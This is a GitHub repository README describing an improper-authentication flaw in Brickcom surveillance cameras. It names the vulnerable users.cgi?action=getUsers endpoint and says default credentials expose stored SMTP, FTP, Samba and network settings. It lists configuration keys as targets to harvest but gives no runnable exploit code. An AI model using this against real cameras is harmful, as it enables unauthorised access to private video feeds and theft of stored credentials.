Brickcom - Security Cameras Surveillance Exploit

Description: (Get credentials with improper authentication and access all config settings from devices)

Several models have a security failure in the endpoint users.cgi?action=getUsers, 
The parameter has an improper authentication failure, 
it is possible to use 2 default credentials to directly access all the credentials 
of the database through the vulnerable endpoint, 
We can check the access in the exporting the configuration file of Device.

Config File Export

IPFilterSetting.permissionType (Permissions Type) IPFilterSetting.allowList.filterEntry0.enabled (Enable Withelist of ip Filtering)

Impact:

get improper access to private cameras
steal smtp credentials

EmailSetting.attachedSnapShotEnabled=0
EmailSetting.attachedVideoClipEnabled=0
EmailSetting.attachedVideoURLEnabled=1
EmailSetting.receiverAddress1=
EmailSetting.receiverAddress2=
EmailSetting.senderAddress=
EmailSetting.senderName=
EmailSetting.subject=
EmailSetting.primary.accountName=
EmailSetting.primary.authenticationMode=1
EmailSetting.primary.password=
EmailSetting.primary.portNo=25
EmailSetting.primary.smtpServerHostName=

Steal FTP credentials (remote server -> save records)

FTPSetting.uploadSnapShotEnabled=0
FTPSetting.uploadVideoClipEnabled=0
FTPSetting.primary.accountName=
FTPSetting.primary.addressType=0
FTPSetting.primary.hostname=
FTPSetting.primary.ipAddress=
FTPSetting.primary.ipv6Address=
FTPSetting.primary.passiveModeEnabled=0
FTPSetting.primary.password=
FTPSetting.primary.portNo=21
FTPSetting.primary.ShareDIR=

Get Samba Credentials

Samba.addressType=0
Samba.hostDns=
Samba.ipAddress=
Samba.ipv6Address=
Samba.password=guest
Samba.preserve=
Samba.userName=guest
Samba.shareDIR=
Samba.workGroup=
Samba.SambaSnapShotEnabled=0
Samba.SambaVideoClipEnabled=1

Basic Network Settings (Discovery ranges of ips and SubMask's)

BasicNetworkSetting.addressType=0
BasicNetworkSetting.dnsAddress1=80.58.61.250
BasicNetworkSetting.dnsAddress2=80.58.61.254
BasicNetworkSetting.gatewayAddress=192.168.1.1
BasicNetworkSetting.ipv4Address=192.168.1.53
BasicNetworkSetting.ipv4Address2nd=192.168.1.245
BasicNetworkSetting.subnetMask=255.255.255.0
BasicNetworkSetting.subnetMask2nd=255.255.255.0
BasicNetworkSetting.enabledIP2nd=0
BasicNetworkSetting.pppoe.password=
BasicNetworkSetting.pppoe.username=
BasicNetworkSetting.defaultgatewayType=0
BasicNetworkSetting.manualDns=0
BasicNetworkSetting.tcp_mss_option=0
BasicNetworkSetting.tcp_mss_value=1500

Wifi Settings

WIFISetting.wifibridge=1
WIFISetting.wlNetworkSetting.wifiaddressType=1
WIFISetting.wlNetworkSetting.wifiipv4Address=
WIFISetting.wlNetworkSetting.wifisubnetMask=
WIFISetting.wlNetworkSetting.wifigatewayAddress=
WIFISetting.wlNetworkSetting.wifidnsAddress1=
WIFISetting.wlNetworkSetting.wifidnsAddress2=
WIFISetting.wlNetworkSetting.wifipppoe.username=
WIFISetting.wlNetworkSetting.wifipppoe.password=

Discovery on Internet Settings

DiscoveryonInternetSetting.enabled=1
DiscoveryonInternetSetting.upnp_status=0
DiscoveryonInternetSetting.register_status=0
DiscoveryonInternetSetting.online=0
DiscoveryonInternetSetting.check=0
DiscoveryonInternetSetting.checkname=0
DiscoveryonInternetSetting.update=0
DiscoveryonInternetSetting.RefreshTime=60
DiscoveryonInternetSetting.RefreshTimeList=1 5 30 60 180 360 1440
DiscoveryonInternetSetting.weburl=
DiscoveryonInternetSetting.username=
DiscoveryonInternetSetting.discovery_check_status=0
DiscoveryonInternetSetting.type=0
DiscoveryonInternetSetting.http_port=80
DiscoveryonInternetSetting.rtsp_port=554
DiscoveryonInternetSetting.publicip=
DiscoveryonInternetSetting.username_backup=
DiscoveryonInternetSetting.wanip_backup=
DiscoveryonInternetSetting.macaddr_backup=
DiscoveryonInternetSetting.port_backup=
DiscoveryonInternetSetting.localip_backup=
DiscoveryonInternetSetting.https_backup=
DiscoveryonInternetSetting.httpport_backup=

DDNS Settings

DDNSSetting.dyndnsEnabled=0
DDNSSetting.dyndns.wildcardEnabled=0
DDNSSetting.dyndns.username=
DDNSSetting.dyndns.password=
DDNSSetting.dyndns.hostname=
DDNSSetting.tzodnsEnabled=0
DDNSSetting.tzodns.wildcardEnabled=0
DDNSSetting.tzodns.username=
DDNSSetting.tzodns.password=
DDNSSetting.tzodns.hostname=
DDNSSetting.noipdnsEnabled=0
DDNSSetting.noipdns.wildcardEnabled=0
DDNSSetting.noipdns.username=
DDNSSetting.noipdns.password=
DDNSSetting.noipdns.hostname=
DDNSSetting.noipdns=1
DDNSSetting.tzolastip=
DDNSSetting.ddns_last_ipaddr=192.168.1.1
DDNSSetting.nameserver=168.95.1.1

Get all cameras in CCTV Center with MultiCameraSetSetting.cameraList (view in export config file)

Name		Name	Last commit message	Last commit date
Latest commit History 43 Commits
LICENSE		LICENSE
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Brickcom - Security Cameras Surveillance Exploit

About

Releases

Packages

License

Luth1er/Brickcom-Surveillance-Exploit

Folders and files

Latest commit

History

Repository files navigation

Brickcom - Security Cameras Surveillance Exploit

About

Resources

License

Stars

Watchers

Forks

Releases

Packages 0

Packages